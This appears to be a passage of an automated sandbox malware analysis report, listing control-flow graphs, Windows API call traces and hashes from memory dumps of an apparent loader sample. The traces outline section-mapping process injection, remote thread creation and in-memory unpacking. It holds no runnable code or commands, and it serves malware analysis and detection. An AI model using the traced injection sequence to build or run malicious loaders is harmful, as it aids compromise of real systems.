                                                                                        • Source File: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_25f0000_k8JAXb3Lhs.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID: cess$kernel32.dll
                                                                                        • API String ID: 4275171209-1230238691
                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                        • Instruction ID: 2bc16f8fc9d674a359e82255396bfaf4460c3dcf40cbb1e3c6c00cf5a97d9ab5
                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                        • Instruction Fuzzy Hash: 1D525B74A01229DFDBA4CF58C984BA8BBB1BF09314F1480D9E54DAB356DB30AE85DF14

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 332 25f0e0f-25f0e24 SetErrorMode * 2 333 25f0e2b-25f0e2c 332->333 334 25f0e26 332->334 334->333
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,025F0223,?,?), ref: 025F0E19
                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,025F0223,?,?), ref: 025F0E1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_25f0000_k8JAXb3Lhs.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                        • Instruction ID: 628376f22f89637915a514a29e8cea632e2d58ee58e53dd2b420f71a9b81e576
                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                        • Instruction Fuzzy Hash: F2D01231545128B7D7402A94DC09BCD7F1CDF05B66F048011FB0DD9081C770954046E9

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                        • String ID:
                                                                                        • API String ID: 1885482327-0
                                                                                        • Opcode ID: 32c7949d56d3da8191661db3a38ee65d17f610e0ddd2cc1157d660d2dd35f03b
                                                                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                        • Opcode Fuzzy Hash: 32c7949d56d3da8191661db3a38ee65d17f610e0ddd2cc1157d660d2dd35f03b
                                                                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                        • String ID:
                                                                                        • API String ID: 1885482327-0
                                                                                        • Opcode ID: ae04734f9b39786081be80ce789597b4a1e39b23fea551aa8062005ff59c2a84
                                                                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                        • Opcode Fuzzy Hash: ae04734f9b39786081be80ce789597b4a1e39b23fea551aa8062005ff59c2a84
                                                                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                        • String ID:
                                                                                        • API String ID: 1885482327-0
                                                                                        • Opcode ID: 5cb1cf3cc1e5bf4755baf7ac3b790f5215e743634697cb06246bb69ab5ac10e7
                                                                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                        • Opcode Fuzzy Hash: 5cb1cf3cc1e5bf4755baf7ac3b790f5215e743634697cb06246bb69ab5ac10e7
                                                                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                        • String ID:
                                                                                        • API String ID: 1885482327-0
                                                                                        • Opcode ID: 137534342241c8c5e645d5a11b5bf708cae17accef258d0ef5f87685d306fe6b
                                                                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                        • Opcode Fuzzy Hash: 137534342241c8c5e645d5a11b5bf708cae17accef258d0ef5f87685d306fe6b
                                                                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 444 286f3f6-286f430 call 286f709 447 286f432-286f465 VirtualAlloc call 286f483 444->447 448 286f47e 444->448 450 286f46a-286f47c 447->450 448->448 450->448
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0286F447
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_285d000_k8JAXb3Lhs.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                        • Instruction ID: 30a384aae7e751b7d7160bf8202613de5e14337de4c7e4d5329d54ac5db72248
                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                        • Instruction Fuzzy Hash: 75113C79A00208EFDB01DF98C989E98BBF5AF08350F05C094FA489B761D371EA50DF80

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                        • String ID:
                                                                                        • API String ID: 1885482327-0
                                                                                        • Opcode ID: 7566c8dc3b7fb910edc6667df7b0a96729b103eb2ec411fa05854360de4f2407
                                                                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                        • Opcode Fuzzy Hash: 7566c8dc3b7fb910edc6667df7b0a96729b103eb2ec411fa05854360de4f2407
                                                                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_25f0000_k8JAXb3Lhs.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .$GetProcAddress.$l
                                                                                        • API String ID: 0-2784972518
                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                        • Instruction ID: e0b32d2eb9f53ff4276b663d4ecf1421a7dbf0d1f7a39fd612ab1229708f77a5
                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                        • Instruction Fuzzy Hash: 74318CB6900609CFDB10CF99C980AAEBBF5FF48324F58404AD941A7355D771EA45CFA8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729366012.000000000285D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_285d000_k8JAXb3Lhs.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                        • Instruction ID: 46588f749df605b498f0d446648f402aa01048a8cbedcf00251f59e469ccd354
                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                        • Instruction Fuzzy Hash: 1411A07A340100AFDB00DF59EC84FB273EAEBA8320B198055EA09CB705E775E801C761
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                                        • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                                                                        • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                                        • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                                        • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                                                                        • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                                        • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729108326.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_25f0000_k8JAXb3Lhs.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                        • Instruction ID: f410919c348453e9a810b2dd9e0dd2eb818f0842cd60fb27fb0a5509632708a4
                                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                        • Instruction Fuzzy Hash: D201F7736116008FDF61CF20C804BAB33E5FB85206F0940A4DB06D72CAE370A8418B84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                                        • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                                                                        • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                                        • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                                        • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                                                                        • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                                        • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                                        • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                                                                        • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                                        • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1728160559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_k8JAXb3Lhs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                                        • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                                                                        • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                                        • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

                                                                                        Execution Graph

                                                                                        Execution Coverage:8.6%
                                                                                        Dynamic/Decrypted Code Coverage:42.6%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:122
                                                                                        Total number of Limit Nodes:4
                                                                                        execution_graph 3261 402e40 3263 402e37 3261->3263 3264 402edf 3263->3264 3265 4018e6 3263->3265 3266 4018f5 3265->3266 3267 40192e Sleep 3266->3267 3268 401949 3267->3268 3270 40195a 3268->3270 3271 401514 3268->3271 3270->3264 3272 401524 3271->3272 3273 4015c4 NtDuplicateObject 3272->3273 3274 4016e0 3272->3274 3273->3274 3275 4015e1 NtCreateSection 3273->3275 3274->3270 3276 401661 NtCreateSection 3275->3276 3277 401607 NtMapViewOfSection 3275->3277 3276->3274 3278 40168d 3276->3278 3277->3276 3279 40162a NtMapViewOfSection 3277->3279 3278->3274 3280 401697 NtMapViewOfSection 3278->3280 3279->3276 3282 401648 3279->3282 3280->3274 3281 4016be NtMapViewOfSection 3280->3281 3281->3274 3282->3276 3378 401542 3379 40153b 3378->3379 3380 4015c4 NtDuplicateObject 3379->3380 3389 4016e0 3379->3389 3381 4015e1 NtCreateSection 3380->3381 3380->3389 3382 401661 NtCreateSection 3381->3382 3383 401607 NtMapViewOfSection 3381->3383 3384 40168d 3382->3384 3382->3389 3383->3382 3385 40162a NtMapViewOfSection 3383->3385 3386 401697 NtMapViewOfSection 3384->3386 3384->3389 3385->3382 3387 401648 3385->3387 3388 4016be NtMapViewOfSection 3386->3388 3386->3389 3387->3382 3388->3389 3283 274e937 3284 274e946 3283->3284 3287 274f0d7 3284->3287 3288 274f0f2 3287->3288 3289 274f0fb CreateToolhelp32Snapshot 3288->3289 3290 274f117 Module32First 3288->3290 3289->3288 3289->3290 3291 274f126 3290->3291 3292 274e94f 3290->3292 3294 274ed96 3291->3294 3295 274edc1 3294->3295 3296 274edd2 VirtualAlloc 3295->3296 3297 274ee0a 3295->3297 3296->3297 3297->3297 3302 271003c 3303 2710049 3302->3303 3315 2710e0f SetErrorMode SetErrorMode 3303->3315 3308 2710265 3309 27102ce VirtualProtect 3308->3309 3311 271030b 3309->3311 3310 2710439 VirtualFree 3314 27104be LoadLibraryA 3310->3314 3311->3310 3313 27108c7 3314->3313 3316 2710223 3315->3316 3317 2710d90 3316->3317 3318 2710dad 3317->3318 3319 2710238 VirtualAlloc 3318->3319 3320 2710dbb GetPEB 3318->3320 3319->3308 3320->3319 3329 2710001 3330 2710005 3329->3330 3335 271092b GetPEB 3330->3335 3332 2710030 3337 271003c 3332->3337 3336 2710972 3335->3336 3336->3332 3338 2710049 3337->3338 3339 2710e0f 2 API calls 3338->3339 3340 2710223 3339->3340 3341 2710d90 GetPEB 3340->3341 3342 2710238 VirtualAlloc 3341->3342 3343 2710265 3342->3343 3344 27102ce VirtualProtect 3343->3344 3346 271030b 3344->3346 3345 2710439 VirtualFree 3349 27104be LoadLibraryA 3345->3349 3346->3345 3348 27108c7 3349->3348 3441 402dd0 3442 402ddc 3441->3442 3443 4018e6 8 API calls 3442->3443 3444 402edf 3442->3444 3443->3444 3359 4018f1 3360 4018f6 3359->3360 3361 40192e Sleep 3360->3361 3362 401949 3361->3362 3363 401514 7 API calls 3362->3363 3364 40195a 3362->3364 3363->3364 3354 2710005 3355 271092b GetPEB 3354->3355 3356 2710030 3355->3356 3357 271003c 7 API calls 3356->3357 3358 2710038 3357->3358 3424 401915 3425 4018c6 3424->3425 3426 40191a 3424->3426 3427 40192e Sleep 3426->3427 3428 401949 3427->3428 3429 401514 7 API calls 3428->3429 3430 40195a 3428->3430 3429->3430 3298 402f97 3299 402fc1 3298->3299 3300 4030ee 3298->3300 3299->3300 3301 40307c RtlCreateUserThread NtTerminateProcess 3299->3301 3301->3300 3414 402d7b 3416 402d38 3414->3416 3415 4018e6 8 API calls 3417 402dc7 3415->3417 3416->3414 3416->3415 3416->3417 3431 274e928 3432 274e937 3431->3432 3433 274f0d7 3 API calls 3432->3433 3434 274e94f 3433->3434 3365 4014fe 3366 401506 3365->3366 3368 401531 3365->3368 3367 4016e0 3368->3367 3369 4015c4 NtDuplicateObject 3368->3369 3369->3367 3370 4015e1 NtCreateSection 3369->3370 3371 401661 NtCreateSection 3370->3371 3372 401607 NtMapViewOfSection 3370->3372 3371->3367 3373 40168d 3371->3373 3372->3371 3374 40162a NtMapViewOfSection 3372->3374 3373->3367 3375 401697 NtMapViewOfSection 3373->3375 3374->3371 3376 401648 3374->3376 3375->3367 3377 4016be NtMapViewOfSection 3375->3377 3376->3371 3377->3367

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 106 4018a5-4018b7 100->106 104 401595-4015be 101->104 105 401896 101->105 104->105 115 4015c4-4015db NtDuplicateObject 104->115 105->106 111 4018c5 106->111 112 4018bc-4018e3 call 401193 106->112 111->112 115->105 117 4015e1-401605 NtCreateSection 115->117 118 401661-401687 NtCreateSection 117->118 119 401607-401628 NtMapViewOfSection 117->119 118->105 121 40168d-401691 118->121 119->118 123 40162a-401646 NtMapViewOfSection 119->123 121->105 124 401697-4016b8 NtMapViewOfSection 121->124 123->118 126 401648-40165e 123->126 124->105 127 4016be-4016da NtMapViewOfSection 124->127 126->118 127->105 129 4016e0 call 4016e5 127->129
                                                                                        APIs
                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                        • String ID:
                                                                                        • API String ID: 1546783058-0
                                                                                        • Opcode ID: 568f309ed97f87b8a61d078b9bba6d1471c13ddb805bf7c68b5a518f8f34664c
                                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                        • Opcode Fuzzy Hash: 568f309ed97f87b8a61d078b9bba6d1471c13ddb805bf7c68b5a518f8f34664c
                                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 153 4018a5-4018b7 147->153 151 401595-4015be 148->151 152 401896 148->152 151->152 162 4015c4-4015db NtDuplicateObject 151->162 152->153 158 4018c5 153->158 159 4018bc-4018e3 call 401193 153->159 158->159 162->152 164 4015e1-401605 NtCreateSection 162->164 165 401661-401687 NtCreateSection 164->165 166 401607-401628 NtMapViewOfSection 164->166 165->152 168 40168d-401691 165->168 166->165 170 40162a-401646 NtMapViewOfSection 166->170 168->152 171 401697-4016b8 NtMapViewOfSection 168->171 170->165 173 401648-40165e 170->173 171->152 174 4016be-4016da NtMapViewOfSection 171->174 173->165 174->152 176 4016e0 call 4016e5 174->176
                                                                                        APIs
                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                        • String ID:
                                                                                        • API String ID: 1652636561-0
                                                                                        • Opcode ID: f7097470ad923524fce6e7b4b5bd0be7acd9ca99c8268d1a6be036565a8250e8
                                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                        • Opcode Fuzzy Hash: f7097470ad923524fce6e7b4b5bd0be7acd9ca99c8268d1a6be036565a8250e8
